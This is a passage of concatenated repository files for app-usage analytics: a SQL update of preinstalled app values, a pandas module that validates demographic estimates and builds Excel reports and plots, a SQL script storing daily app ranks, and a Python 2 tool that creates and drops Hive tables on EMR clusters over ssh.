INPUT TABLE(S) : temp.application_data,
temp.settings_excluded_preinstalled_apps
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) :
QUERY STEPS :
*/
UPDATE
temp.application_data a
JOIN temp.settings_excluded_preinstalled_apps e
ON a.application_id = e.application_id
SET
-- Note that the ordering is important, else NULL will be set as
-- preinstalled value.
a.preinstalled_value = a.real_value,
a.real_value = NULL
WHERE
a.type = 'free'
;<file_sep>/aa_au_model/correction/validation.py
import data
import datetime
import numpy as np
import pandas as pd
import utils
from collections import OrderedDict
from IPython.display import display
from IPython.html import widgets
from matplotlib import pyplot as plt
colors = {
'red': '#F5A9BC',
'blue': '#A9A9F5',
'grey': '#E6E6E6',
'orange': '#FAAC58',
'green': '#82FA58',
'white': '#FFFFFF',
'purple': '#FA58F4'
}
growth_params = {
'type': '3_color_scale',
'min_color': colors['blue'], 'mid_color': colors['white'],
'max_color': colors['red'],
'min_value': -0.5, 'mid_value': 0, 'max_value': 0.5,
'min_type': 'num', 'mid_type': 'num', 'max_type': 'num'
}
abs_growth_params = {
'type': '2_color_scale',
'min_color': colors['white'], 'max_color': colors['orange'],
'min_value': 0, 'max_value': 0.5,
'min_type': 'num', 'max_type': 'num'
}
age_params = {
'type': '3_color_scale',
'min_color': colors['grey'], 'mid_color': colors['white'],
'max_color': colors['green'],
'min_value': 0, 'mid_value': 0.5, 'max_value': 1,
'min_type': 'num', 'mid_type': 'num', 'max_type': 'num'
}
gender_params = {
'type': '3_color_scale',
'min_color': colors['purple'], 'mid_color': colors['white'],
'max_color': colors['blue'],
'min_value': 0, 'mid_value': 0.5, 'max_value': 1,
'min_type': 'num', 'mid_type': 'num', 'max_type': 'num'
}
APP_COLUMNS = ['app_id', 'device_type']
DATE_COLUMNS = ['end_date', 'device_type']
DEMOGRAPHIC_COLUMNS = ['female,old', 'female,young',
'male,old', 'male,young']
GROWTH_COLS = ['au_v2', 'au_v1']
growth_names = ['growth_' + c for c in GROWTH_COLS]
PP_GROWTH_COLS = ['young', 'male'] + DEMOGRAPHIC_COLUMNS
pp_growth_names = ['pp_growth_' + c for c in PP_GROWTH_COLS]
def get_estimated_sample_composition(probabilities):
"""
Calculate the sample composition from the estimated probabilities per device.
:param probabilities: DataFrame with probabilities per device
:return DataFrame with sample composition per platform,device_type,end_date
"""
sample_composition = probabilities.groupby(['platform', 'device_type', 'end_date']).sum()
return sample_composition.divide(sample_composition.sum(axis=1), axis='rows')
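# A minimal sketch (hypothetical probabilities): if one platform/device_type/week
# group sums to {'female,old': 10, 'female,young': 30, 'male,old': 20,
# 'male,young': 40}, its returned composition row is 0.1, 0.3, 0.2 and 0.4.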
def get_fb_insights_composition(fb_insights, cumulative=True):
"""
Calculate the Facebook Insights composition per week.
:param fb_insights: DataFrame Facebook Insights composition per day
:param cumulative: If True, returned composition is cumulated week over week. If False, only first connection data
is summed over week
:return DataFrame with Facebook Insights composition per platform,end_date
"""
fb_insights['bucket'] = fb_insights.gender + ',' + fb_insights.age_bin.apply(lambda x: ('young' if x == '13-24' else
'old'))
fb_insights['end_date'] = fb_insights.date.apply(utils.get_week_end)
fbi_summary = fb_insights.groupby(['bundle_id', 'end_date', 'bucket']).agg({'count': 'sum',
'date': 'max'}).reset_index()
fbi_summary['cumsum'] = fbi_summary.groupby(['bundle_id', 'bucket'])['count'].cumsum()
fbi_summary = fbi_summary.fillna(0)
if cumulative:
column_name = 'cumsum'
else:
column_name = 'count'
fbi_composition = fbi_summary.set_index(['bundle_id', 'end_date', 'bucket'])[column_name].unstack()
return fbi_composition.divide(fbi_composition.sum(axis=1), axis='rows')
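# Note on the `cumulative` flag (an illustrative sketch): with weekly first
# connections of 10 and then 20 for one bucket, cumulative=True normalises the
# running totals 10 and 30 against the other buckets, while cumulative=False
# normalises the per-week counts 10 and 20 directly.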
def validate_bucket_estimations(probabilities, adx, return_share=False):
"""
Calculate the true buckets of users that have a bucket prediction of >= 75%.
:param probabilities: DataFrame with probabilities per device
:param adx: DataFrame with adx data
:param return_share: If True, returns share of true buckets. If False, absolute count.
:return DataFrame with true bucket composition per platform,device_type,end_date,estimated_bucket
"""
adx_useful = adx[~((pd.isnull(adx.gender)) | (pd.isnull(adx.age_bin)))].copy()
adx_useful['age_binned'] = adx_useful.age_bin.apply(lambda x: 'young' if x == '13-24' else 'old')
adx_useful['bucket'] = adx_useful.gender + ',' + adx_useful.age_binned
labels = probabilities.columns[~probabilities.columns.isin(['device_id', 'end_date', 'device'])].values
validate_m_prbas = pd.melt(probabilities, id_vars=['device_id', 'platform', 'device_type', 'end_date'])
validate_m_prbas = validate_m_prbas[validate_m_prbas.value >= 0.75]
validate_m_prbas = pd.merge(validate_m_prbas,
adx_useful[adx_useful.bucket.isin(labels)][['device_id', 'bucket']],
on='device_id')
GROUP_COLS = ['platform', 'device_type', 'end_date', 'variable', 'bucket']
validate_m_prbas = validate_m_prbas.groupby(GROUP_COLS).device_id.count().reset_index()
validate_m_prbas = validate_m_prbas.set_index(GROUP_COLS).unstack()
if return_share:
validate_m_prbas = validate_m_prbas.divide(validate_m_prbas.sum(axis=1), axis='rows')
return validate_m_prbas
def get_active_user_stats(time_frame):
"""
Get all active users stats.
:param time_frame: Time Frame to load ('weekly' or 'monthly')
:type time_frame: str
:return: Active user stats
    :rtype: pandas.DataFrame
"""
active_users = data.load_active_users(time_frame)
app_info = data.load_dpi_apps(datetime.datetime.now().date() -
datetime.timedelta(days=10))
active_users = pd.merge(active_users, app_info)
return _compute_statistics(active_users)
def _compute_statistics(active_users, top_rank=150):
"""
Compute active user statistics.
:param active_users: Active users with app info (see data.load_active_users())
:type active_users: pandas.DataFrame
    :param top_rank: Maximum rank for an app to be flagged as a top app
    :type top_rank: int
    :return: active_users augmented with ranking, growth and demographic stats
:rtype: pandas.DataFrame
"""
app_groups = active_users.groupby(APP_COLUMNS)
date_groups = active_users.groupby(DATE_COLUMNS)
# Info cols.
active_users['date'] = active_users.end_date.dt.date
active_users['app_name'] = active_users['app_name'].str.decode('ascii',
'ignore')
active_users['device_type'] = active_users.device_type.map({1: 'iPhone', 2: 'iPad'})
# Compute demographic stats.
demographic_fraction = active_users[DEMOGRAPHIC_COLUMNS].divide(active_users.au_v2,
axis='rows')
active_users[DEMOGRAPHIC_COLUMNS] = demographic_fraction
active_users['young'] = active_users['female,young'] + active_users['male,young']
active_users['male'] = active_users['male,young'] + active_users['male,old']
# Compute rank stats.
active_users[['rank_v1', 'rank_v2']] = date_groups[['au_v1', 'au_v2']].rank(method='first',
ascending=False)
active_users['top_app'] = active_users['rank_v2'] <= top_rank
# Compute growth stats.
active_users[growth_names] = app_groups[GROWTH_COLS].apply(lambda x: x.diff() / x)
active_users[pp_growth_names] = app_groups[PP_GROWTH_COLS].apply(lambda x: x.diff())
active_users['growth_au_v2_abs'] = active_users.growth_au_v2.abs()
active_users['change_v2_v1'] = active_users.au_v2 / active_users.au_v1 - 1
active_users['rank_diff'] = active_users['rank_v2'] - active_users['rank_v1']
active_users['rank_growth'] = app_groups['rank_v2'].apply(lambda x: - x.diff())
return active_users
def output_report(active_users_stats, time_frame, date, output_folder='out/checks/'):
"""
Output Excel report for iPad and iPhone estimates.
:param active_users_stats: All active user stats (see get_active_user_stats())
:type active_users_stats: pandas.DataFrame
:param time_frame: Time Frame to load ('weekly' or 'monthly')
:type time_frame: str
:param date: End date to output
:type date: datetime.datetime
:param output_folder: Folder to save to
:type output_folder: str
:return: None
"""
device_groups = active_users_stats.groupby('device_type')
for device, device_au in device_groups:
file_name = '_'.join(['au', time_frame, str(date.date()), device]) + '.xlsx'
output_path = output_folder + file_name
# Filter.
current_au = device_au[(device_au.end_date == date) &
device_au.data_check1].copy()
previous_au = device_au[(device_au.end_date <= date) &
device_au.data_check1].copy()
# Get data.
leaderboard = _get_leaderboard(current_au)
composition = _get_composition(current_au)
growers = _get_growth(current_au)
problem_apps = _get_problem_apps(previous_au)
_output_to_excel(output_path, leaderboard, composition, growers,
problem_apps)
def _get_leaderboard(period_au):
"""
Get leaderboard stats.
:param period_au: Active users stats for a period
:type period_au: pandas.DataFrame
:return: Leaderboard
    :rtype: pandas.DataFrame
"""
LEADERBOARD_ORDERING = ['app_name', 'bundle_id', 'rank_v2', 'au_v2',
'growth_au_v2', 'rank_growth', 'au_v1', 'change_v2_v1',
'rank_v1', 'rank_diff', 'top_app']
leaderboard = period_au[LEADERBOARD_ORDERING].copy()
leaderboard.sort('rank_v2', inplace=True)
leaderboard.rename(columns=_prettify_column_name, inplace=True)
return leaderboard
def _get_composition(period_au):
"""
Get composition stats.
:param period_au: Active users stats for a period
:type period_au: pandas.DataFrame
:return: Composition stats
    :rtype: pandas.DataFrame
"""
COMPOSITION_ORDERING = (['app_name', 'bundle_id', 'au_v2', 'rank_v2'] +
DEMOGRAPHIC_COLUMNS +
['young', 'male', 'top_app'])
composition = period_au[COMPOSITION_ORDERING].copy()
composition.sort(['top_app', 'au_v2'], ascending=False, inplace=True)
composition.rename(columns=_prettify_column_name, inplace=True)
return composition
def _get_growth(period_au):
"""
Get growth stats.
:param period_au: Active users stats for a period
:type period_au: pandas.DataFrame
:return: Growth stats
    :rtype: pandas.DataFrame
"""
GROWTH_ORDERING = (['app_name', 'bundle_id', 'au_v2', 'rank_v2'] +
growth_names + pp_growth_names +
['top_app'])
growers = period_au[GROWTH_ORDERING].copy()
growers.sort(['top_app', 'growth_au_v2'], ascending=False, inplace=True)
growers.rename(columns=_prettify_column_name, inplace=True)
return growers
def _get_problem_apps(au):
"""
Get apps that are new or now missing.
:param au: Active users stats
:type au: pandas.DataFrame
:return: Problem stats
    :rtype: pandas.DataFrame
"""
temp = au[au.data_check1]
estimated_apps = pd.pivot_table(temp, index=['app_name', 'bundle_id'],
columns='end_date', values='country',
aggfunc=lambda x: True if x.any() else False,
fill_value=False)
if estimated_apps.shape[1] > 1:
last_two_periods = estimated_apps.ix[:, -2:]
# Problem apps: new or missing apps.
problem_apps = last_two_periods.ix[last_two_periods.sum(axis=1) == 1].copy()
problem_apps.columns = ['previous', 'current']
status = ['missing', 'newly estimated']
problem_apps['status'] = problem_apps.current.apply(lambda x: status[x])
problem_apps.reset_index(inplace=True)
problem_apps.sort(['status', 'app_name'], inplace=True)
problem_apps.drop(['previous', 'current'], axis=1, inplace=True)
problem_apps.rename(columns=_prettify_column_name, inplace=True)
else:
        problem_apps = pd.DataFrame({'app_name': None, 'bundle_id': None,
                                     'status': None}, index=[0])
        problem_apps.rename(columns=_prettify_column_name, inplace=True)
return problem_apps
def _prettify_column_name(s):
"""
Prettify column names.
:param s: Name
    :type s: str
:return: Prettified name
:rtype: str
"""
s = s.capitalize()
s = s.replace('Au_', '')
s = s.replace('au_', '')
s = s.replace('v1', 'V1')
s = s.replace('v2', 'V2')
s = s.replace('_', ' ')
return s
def _output_to_excel(output_path, leaderboard, composition, growers, problem_apps):
"""
Output report to excel.
:param output_path: Output path
:type output_path: str
:param leaderboard: Leaderboard stats (see _get_leaderboard())
:type leaderboard: pandas.DataFrame
:param composition: Composition stats (see _get_composition())
:type composition: pandas.DataFrame
:param growers: Growth stats (see _get_growth())
:type growers: pandas.DataFrame
:param problem_apps: Problem apps stats (see _get_composition())
:type problem_apps: pandas.DataFrame
:return: None
"""
with pd.ExcelWriter(output_path, engine='xlsxwriter') as excel_writer:
workbook = excel_writer.book
number_format = workbook.add_format({'num_format': 0x03})
percentage_format = workbook.add_format({'num_format': 0x0a})
def df_to_sheet(df, sheet_name):
"""
:param df: DataFrame to output
:type df: pandas.DataFrame
:param sheet_name: Name of sheet
:type sheet_name: str
:return: Outputted sheet
:rtype: xlsxwriter.Worksheet
"""
df.to_excel(excel_writer, index=False, sheet_name=sheet_name)
return excel_writer.sheets[sheet_name]
def set_conditional_formatting(sheet, begin_col, end_col, params):
""" Set conditional formatting for a range of columns for rows 2:end.
:param sheet: Sheet to format
:type sheet: xlsxwriter.Worksheet
:param begin_col: Begin column
:type begin_col: str
:param end_col: End column
:type end_col: str
:param params: Parameter to use (see Worksheet.conditional_format())
:type params: dict
:return: None
"""
n_row = sheet.dim_rowmax + 1
cell_range = '%s%i:%s%i' % (begin_col, 2, end_col, n_row)
sheet.conditional_format(cell_range, params)
def format_leaderboard(sheet, n_cols):
""" Format Leaderboard sheet.
:param sheet: Leaderboard sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.autofilter(0, 0, 1, n_cols-1)
sheet.freeze_panes(1, 4)
set_conditional_formatting(sheet, 'E', 'E', growth_params)
set_conditional_formatting(sheet, 'H', 'H', growth_params)
sheet.set_column('E:E', None, percentage_format)
sheet.set_column('D:D', None, number_format)
sheet.set_column('G:G', None, number_format)
sheet.set_column('H:H', None, percentage_format)
sheet.set_column('C:L', width=15)
sheet.set_column('A:A', width=20)
def format_composition(sheet, n_cols):
""" Format Composition sheet.
:param sheet: Composition sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.freeze_panes(1, 4)
sheet.autofilter(0, 0, 1, n_cols-1)
set_conditional_formatting(sheet, 'E', 'H', abs_growth_params)
set_conditional_formatting(sheet, 'I', 'I', age_params)
set_conditional_formatting(sheet, 'J', 'J', gender_params)
sheet.set_column('E:J', None, percentage_format)
sheet.set_column('C:C', None, number_format)
sheet.set_column('C:K', width=15)
sheet.set_column('A:A', width=30)
def format_growers(sheet, n_cols):
""" Format Growers sheet.
:param sheet: Growers sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.autofilter(0, 0, 1, n_cols-1)
sheet.freeze_panes(1, 4)
set_conditional_formatting(sheet, 'E', 'L', growth_params)
sheet.set_column('E:L', None, percentage_format)
sheet.set_column('C:C', None, number_format)
sheet.set_column('C:M', width=20)
sheet.set_column('A:A', width=30)
def format_problem_apps(sheet, n_cols):
""" Format Problem apps sheet.
:param sheet: Problem apps sheet
:type sheet: xlsxwriter.Worksheet
:param n_cols: # columns on sheet
:type n_cols: int
:return: None
"""
sheet.autofilter(0, 0, 1, n_cols-1)
sheet.freeze_panes(1, 2)
sheet.set_column('C:C', width=15)
sheet.set_column('A:A', width=30)
leaderboard_sheet = df_to_sheet(leaderboard, 'Leaderboard')
composition_sheet = df_to_sheet(composition, 'Composition')
growers_sheet = df_to_sheet(growers, 'Growth')
problem_apps_sheets = df_to_sheet(problem_apps, 'New or missing apps')
format_leaderboard(leaderboard_sheet, leaderboard.shape[1])
format_composition(composition_sheet, composition.shape[1])
format_growers(growers_sheet, growers.shape[1])
format_problem_apps(problem_apps_sheets, problem_apps.shape[1])
def show_app_estimates(active_users_stats, n_plots_per_page=10, plot_size=4):
"""
Show app estimates dynamically.
:param active_users_stats: All active user stats (see get_active_user_stats())
:type active_users_stats: pandas.DataFrame
:param n_plots_per_page: # plots per page
:type n_plots_per_page: int
:param plot_size: Size of subplot
:type plot_size: int
:return: None
"""
def plot_wrapper(device_type, date, metric, sort_by, page):
_create_plot(active_users_stats, device_type, date, metric, sort_by, page,
n_plots_per_page, plot_size)
# Create all widgets and add them to the wrapper function.
children = _create_dropdowns_from_df(active_users_stats, ['device_type', 'date'])
children['metric'] = _create_dropdown(['AU', 'Demographics', 'Age & Gender'])
children['sort_by'] = _create_dropdown(['au_v1', 'au_v2'] + DEMOGRAPHIC_COLUMNS +
['young', 'male'])
max_plots = active_users_stats.groupby(['end_date', 'device_type'])['bundle_id'].count().max()
children['page'] = widgets.IntSlider(description='page', value=1, min=1,
max=int(np.ceil(max_plots * 1. / n_plots_per_page)))
interactive_widgets = widgets.interactive(plot_wrapper, **children)
# Create containers with horizontal orientation and put those in a container.
sub_container_1 = widgets.HBox(children=interactive_widgets.children[:-1])
sub_container_2 = widgets.HBox(children=(interactive_widgets.children[-1], ))
container_main = widgets.Box(children=(sub_container_1, sub_container_2))
# Display.
display(container_main)
plot_wrapper(*(wid.value for wid in children.itervalues()))
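# Example notebook usage (a sketch; `stats` is assumed to come from
# get_active_user_stats(), referenced in the docstrings above):
#   stats = get_active_user_stats(...)
#   show_app_estimates(stats, n_plots_per_page=10, plot_size=4)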
def _create_plot(active_users_stats, device, date, metric, sort_by, page, n_plots_per_page, plot_size):
"""
Create the interactive plot manipulated by the widgets.
:param active_users_stats: All active user stats (see get_active_user_stats())
:type active_users_stats: pandas.DataFrame
:param device: Device to show ('iPad' or 'iPhone')
:type device: str
:param date: Latest date to show for
:type date: datetime.datetime
:param metric: Metric to plot ('AU', 'Age & Gender' or 'Demographics')
:type metric: str
:param sort_by: Column to sort by
:type sort_by: str
:param page: Page to show
:type page: int
    :param n_plots_per_page: # plots per page
    :type n_plots_per_page: int
    :param plot_size: Size of subplot
    :type plot_size: int
    :return: Figure and axes of the created plot
"""
N_COLS = 5
n_rows = int(np.ceil(n_plots_per_page * 1. / N_COLS))
# Filter and rank data.
selection = _select_data(active_users_stats, {'device_type': device})
valid_data = _filter_by_date(selection, date)
# Determine rankings for apps.
ranking = _get_latest_app_rank(valid_data, sort_by)
is_ranked = valid_data.bundle_id.isin(ranking.bundle_id)
ranked_data = valid_data.ix[is_ranked]
chunk_ix = range(min((page - 1) * n_plots_per_page, len(ranking)),
min(page * n_plots_per_page, len(ranking)))
# Create plot.
fig, ax = plt.subplots(n_rows, N_COLS, sharex=True,
figsize=(N_COLS * plot_size, n_rows * plot_size))
ax = ax.reshape(-1)
app_groups = ranked_data.groupby('bundle_id')
for ii_plot, bundle_id in enumerate(ranking.iloc[chunk_ix].bundle_id):
app_data = app_groups.get_group(bundle_id)
name = utils.prettify_app_name(app_data.app_name.iloc[0])
title = '{rank}. {name}'.format(rank=int(chunk_ix[ii_plot]+1), name=name)
if metric == 'AU':
plot_data = app_data.set_index('date')[['au_v1', 'au_v2']]
plot_data.plot(style='-o', ax=ax[ii_plot], title=title, rot=45)
ax[ii_plot].set_ylim(0, plot_data.max().max() * 1.05)
ax[ii_plot].legend(loc='lower left', frameon=True)
elif metric == 'Age & Gender':
plot_data = app_data.set_index('date')[['young', 'male']]
plot_data.plot(style='-o', ax=ax[ii_plot], title=title, rot=45)
ax[ii_plot].set_ylim(0, 1)
ax[ii_plot].legend(loc='lower left', frameon=True)
elif metric == 'Demographics':
plot_data = app_data.set_index('date')[DEMOGRAPHIC_COLUMNS]
plot_data.plot(kind='bar', stacked=True, ax=ax[ii_plot], title=title, rot=45)
ax[ii_plot].set_ylim(0, 1)
ax[ii_plot].legend(loc='lower left', frameon=True)
else:
raise Exception("Unknown metric: " + metric)
return fig, ax
def _select_data(df, selections):
"""
Select data using a dictionary.
:param df: DataFrame
:type df: pandas.DataFrame
:param selections: Keys for the columns to filter, values for the values to filter with
:type selections: dict
:return: Filtered DataFrame
    :rtype: pandas.DataFrame
"""
is_valid = np.ones_like(df.icol(0)).astype(bool)
for col, value in selections.iteritems():
is_valid &= (df[col] == value)
return df.ix[is_valid].copy()
def _create_dropdowns_from_df(df, dropdown_cols):
"""
Create dropdown widgets for columns in a DataFrame.
:param df: Data
:type df: pandas.DataFrame
:param dropdown_cols: Names of columns
:type dropdown_cols: list
:return: dict containing dropdown widgets
:rtype collections.OrderedDict
"""
widget_list = []
for col in dropdown_cols:
unique_values = df[col].unique().tolist()
unique_values.sort(reverse=True)
w = _create_dropdown(unique_values)
widget_list.append(w)
return OrderedDict(zip(dropdown_cols, widget_list))
def _create_dropdown(values):
"""
Create dropdown widget for a list of values.
:param values: List of values
:return: Dropdown widget
    :rtype: IPython.widgets.Dropdown
"""
values_dict = OrderedDict(zip(map(str, values), values))
w = widgets.Dropdown(options=values_dict)
return w
def _filter_by_date(df, date, n_periods=4):
"""
Get latest data points for a date.
:param df: data
:type df: pd.DataFrame
:param date: Latest date
:type date: datetime.datetime
:param n_periods: # data points to keep
:type n_periods: int
:return: Filtered data
:rtype: pandas.DataFrame
"""
dates = df.date.unique()
dates.sort()
valid_dates = dates[dates <= date][-n_periods:]
is_valid = df['date'].isin(valid_dates)
return df[is_valid].copy()
def _get_latest_app_rank(df, sort_by):
"""
Get ranks for latest date.
:param df: DataFrame with bundle_id and sort_by column
    :type df: pandas.DataFrame
:param sort_by: Column to sort by
:type sort_by: str
:return: Rankings for each bundle ID
:rtype: pandas.DataFrame
"""
latest_data = df.ix[df.date == df.date.max()]
latest_data.set_index('bundle_id', inplace=True)
rankings = latest_data[sort_by].rank(ascending=False, method='first')
rankings.name = 'rank'
rankings.order(inplace=True)
return rankings.reset_index()
<file_sep>/int-vs-m-benchmark/sql/ios/1001i2-store_daily_ranks.sql
/*
Save the ranks of each day to the daily_ranks table.
*/
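-- Note: the data column below stores the ranked app ids as one space-separated
-- string wrapped in a JSON-style array, e.g. ["10 42 7"].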
drop temporary table if exists temp.daily_ranks_temp;
create temporary table temp.daily_ranks_temp (
store_id int not null,
category_id int not null,
feed int not null,
date date not null,
data longtext,
constraint primary key (
store_id,
category_id,
feed,
date)
)
select
cnm.store_id,
cgm.appannie_category_id as category_id,
fdtm.feed,
r.date,
CONCAT('["', group_concat(r.application_id order by r.rank asc separator ' '), '"]') as data
from
temp.rankings r
join aa_benchmarking_ios.feed_device_type_mappings fdtm
using(device_id, type)
join aa_benchmarking_ios.country_mappings cnm
using(country_id)
join aa_benchmarking_ios.category_mappings cgm
on r.category_id = cgm.distimo_category_id
group by
r.date,
fdtm.feed,
cnm.store_id,
cgm.appannie_category_id
;
-- Remove values already present for generated stores and days.
delete
r.*
from
aa_benchmarking_ios.daily_ranks r
join temp.daily_ranks_temp t
using(store_id, date);
-- Insert new values.
insert into aa_benchmarking_ios.daily_ranks
select
t.store_id,
t.category_id,
t.feed,
t.date,
t.data
from
temp.daily_ranks_temp t;
<file_sep>/aa_au_model/hive_scripts/tools/amr_hive_tool.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import os
import sys
import commands
import getopt
import re
import time
import datetime
import simplejson
import settings
SUPPORTED_TYPES = ['hbase', 's3']
HIVE_TYPE_MAPPING = {
'chararray': 'string',
'long': 'bigint',
'float': 'float',
'double': 'double',
'int': 'bigint'
}
SCHEMA_PATH_MAPPING = {
'_o': 'oss',
'_d': 'dimension',
'_f': 'fact',
'_p': 'migration',
'_i': 'interface',
'_m': 'maintenance'
}
def is_dir(bucket, path):
path = os.path.join(settings.S3_MNT_PREFIX, bucket, path)
s3_bucket_list_result = os.path.isdir(path)
return s3_bucket_list_result
def last_date_range(date_str, days):
date = datetime.datetime.strptime(date_str, '%Y-%m-%d')
for i in range(days):
cur_date = date - datetime.timedelta(days=i)
yield cur_date.strftime('%Y-%m-%d')
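# Example (a sketch): list(last_date_range('2015-01-03', 3))
# -> ['2015-01-03', '2015-01-02', '2015-01-01']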
def last_hour_range(date_str, days, hours=24):
date = datetime.datetime.strptime(date_str, '%Y-%m-%d')
if hours > 24 or hours < 1:
hours = 24
for i in range(days):
cur_date = date - datetime.timedelta(days=i)
for j in range(hours):
_hour = "%02d" % j
yield cur_date.strftime('%Y-%m-%d'), _hour
def load_default_schema(schemas=settings.DEFAULT_SCHEMAS):
try:
schema_dict = {}
for schema_file_name, parameters in schemas.iteritems():
schema_path = SCHEMA_PATH_MAPPING[schema_file_name.lower().split('.')[0][-2:]]
schema_def_root_path = os.path.join(
os.path.split(os.path.realpath(__file__))[
0], '../schema', schema_path
)
schema_def_file_path = os.path.join(
schema_def_root_path, schema_file_name
)
d = simplejson.loads(
open(schema_def_file_path, 'r').read()
)
if d['type'] not in SUPPORTED_TYPES:
continue
schema_name = schema_file_name.rsplit('_', 1)[0]
if len(parameters) == 0:
schema_dict[schema_name] = d
# replace special variables like "range_type"
else:
for parameter_dict in parameters:
sub_schema_name = '_'.join([schema_name, parameter_dict['table_type']])
del parameter_dict['table_type']
sub_d = d.copy()
for k, v in parameter_dict.iteritems():
if k in sub_d['table']:
sub_d['table'] = sub_d['table'].replace(k, v)
schema_dict[sub_schema_name] = sub_d
return schema_dict
    except Exception:
return None
def replace_table_name(hive_file_str):
"""
Replace hive table name
"""
schema_list = re.findall(r'TABLE ###(.+?)###', hive_file_str)
for schema_name in set(schema_list):
hive_file_str = hive_file_str.replace(
'TABLE ###%s###' % schema_name,
'TABLE %s' % schema_name.rsplit('_', 1)[0]
)
return hive_file_str
def generate_hive_table_columns(schema_meta):
schema_type = schema_meta['type']
_columns = []
for _index, _column in enumerate(schema_meta['schema']):
if schema_type == 's3':
_column_segs = _column.strip().split(':')
elif schema_type == 'hbase':
if _index == 0:
_columns.append("key string")
_column_segs = _column[1].strip().split(':')
_column_name = _column_segs[0]
if _column_name == 'timestamp':
# here timestamp is hive keyword, need to be changed
_column_name = 'timestamps'
_column_type = HIVE_TYPE_MAPPING[_column_segs[1]]
_columns.append("%s %s" % (_column_name, _column_type))
return ','.join(_columns)
def generate_hive_table_meta(schema_name, schema_meta, load_date, days, incremental):
schema_type = schema_meta['type']
table_str = schema_meta['table']
if schema_type == 's3':
# '$date' could be in the middle of table name string
if not table_str.endswith('$hour') and '$date' in table_str:
_table_partitions = []
for _range_str in last_date_range(load_date, days):
_table_str = table_str.replace('$date', _range_str)
if is_dir(settings.__dict__[schema_meta['bucket']], _table_str):
_table_partitions.append(
"ALTER TABLE %s ADD PARTITION (dateStr = \\\"%s\\\") location \\\"s3n://%s/%s\\\";"
% (schema_name, _range_str, settings.__dict__[schema_meta['bucket']],
_table_str))
if incremental is True:
return '\n'.join(_table_partitions)
else:
return "PARTITIONED BY (dateStr STRING) ROW FORMAT DELIMITED FIELDS TERMINATED BY \\\"\\t\\\";\n%s" % \
'\n'.join(_table_partitions)
elif table_str.endswith('$hour'):
_table_partitions = []
for _range_str, _hour in last_hour_range(load_date, days):
_table_str = '/'.join([schema_meta['table'].rsplit('/', 2)[0], _range_str, _hour])
if is_dir(settings.__dict__[schema_meta['bucket']], _table_str):
_table_partitions.append(
"ALTER TABLE %s ADD PARTITION (dateStr = \\\"%s\\\", hourStr = \\\"%s\\\") location \\\"s3n://%s/%s\\\";"
% (schema_name, _range_str, _hour, settings.__dict__[schema_meta['bucket']],
_table_str))
if incremental is True:
return '\n'.join(_table_partitions)
else:
return "PARTITIONED BY (dateStr STRING, hourStr STRING) ROW FORMAT DELIMITED FIELDS TERMINATED BY \\\"\\t\\\";\n%s" % \
'\n'.join(_table_partitions)
else:
if incremental is True:
return '\n'
else:
return "ROW FORMAT DELIMITED FIELDS TERMINATED BY \\\"\\t\\\" LOCATION \\\"s3n://%s/%s\\\";" % \
(settings.__dict__[schema_meta['bucket']], table_str)
elif schema_type == 'hbase':
_alias = [':key']
for _column in schema_meta['schema']:
_alias.append(_column[0].strip())
return "STORED BY \\\"org.apache.hadoop.hive.hbase.HBaseStorageHandler\\\"" \
" WITH SERDEPROPERTIES (\\\"hbase.columns.mapping\\\" = \\\"%s\\\")" \
" TBLPROPERTIES (\\\"hbase.table.name\\\" = \\\"%s\\\");" \
% (','.join(_alias), table_str)
def yield_hive_ddl_script(load_date, days=1, default=False, incremental=False):
"""
Generate hive table DDL without template
"""
schemas = load_default_schema()
for schema_name, schema_meta in schemas.items():
table_columns = generate_hive_table_columns(schema_meta)
table_meta = generate_hive_table_meta(
schema_name, schema_meta, load_date, days, incremental)
# drop external table if exist
_drop_table = "DROP TABLE IF EXISTS %s;\n" % schema_name
if incremental is False:
yield (schema_name, "%s CREATE EXTERNAL TABLE %s(%s) %s" % (_drop_table, schema_name, table_columns, table_meta))
else:
# alter existed tables only
yield (schema_name, table_meta)
def create_hive_tables(cluster_id, load_date, days, verbose, default=False, local=False, cluster_type='emr', incremental=False):
    scripts = yield_hive_ddl_script(load_date, days, default, incremental)
    status, output = 1, ''
    for table_name, script in scripts:
try:
if local:
status, output = runHiveStepLocal(script, verbose)
else:
status, output = runHiveStep(cluster_id, script, verbose, cluster_type)
if status == 0:
print 'Created External Table %s Successfully!' % table_name
else:
if 'Table %s already exists' % table_name in output:
print 'External Table %s already created!' % table_name
else:
print 'Created External Table %s Failed!' % table_name
except Exception:
print 'Created External Table %s Failed!' % table_name
return status, output
def drop_all_tables(cluster_id, verbose, cluster_type='emr'):
assert cluster_type in ('emr', 'amr'), ('Unknown cluster type: %s' % cluster_type)
output = 'Rate exceeded'
while output.endswith('Rate exceeded'):
if cluster_type == 'emr':
_command_str = '/usr/local/bin/aws emr ssh --cluster-id %s --key-pair-file %s ' \
'--command "hive -e \'show tables\' | /usr/bin/xargs -I \'{}\' hive -e \'drop table {}\'"' % (
cluster_id, settings.EMR_KEY_PAIR_FILE
)
elif cluster_type == 'amr':
_command_str = 'ssh %s -i %s ' \
'"hive -e \'show tables\' | /usr/bin/xargs -I \'{}\' hive -e \'drop table {}\'"' % (
cluster_id, settings.EMR_KEY_PAIR_FILE
)
status, output = commands.getstatusoutput(_command_str)
if verbose:
print _command_str
time.sleep(1)
return status, output
def runHiveStep(cluster_id, hql, verbose, cluster_type='emr'):
assert cluster_type in ('emr', 'amr'), ('Unknown cluster type: %s' % cluster_type)
output = 'Rate exceeded'
while output.endswith('Rate exceeded'):
if cluster_type == 'emr':
_command_str = "/usr/local/bin/aws emr ssh --cluster-id %s --key-pair-file %s " \
"--command 'hive -e \"%s\"'" % (
cluster_id, settings.EMR_KEY_PAIR_FILE, hql
)
elif cluster_type == 'amr':
_command_str = "ssh %s -i %s " \
"'hive -e \"%s\"'" % (
cluster_id, settings.EMR_KEY_PAIR_FILE, hql
)
status, output = commands.getstatusoutput(_command_str)
if verbose:
print _command_str
time.sleep(1)
return status, output
def runHiveStepLocal(hql, verbose):
status = 1
while status == 1:
_command_str = 'hive -e \"%s\"' % (
hql
)
status, output = commands.getstatusoutput(_command_str)
if verbose:
print _command_str
time.sleep(1)
return status, output
def usage():
print """
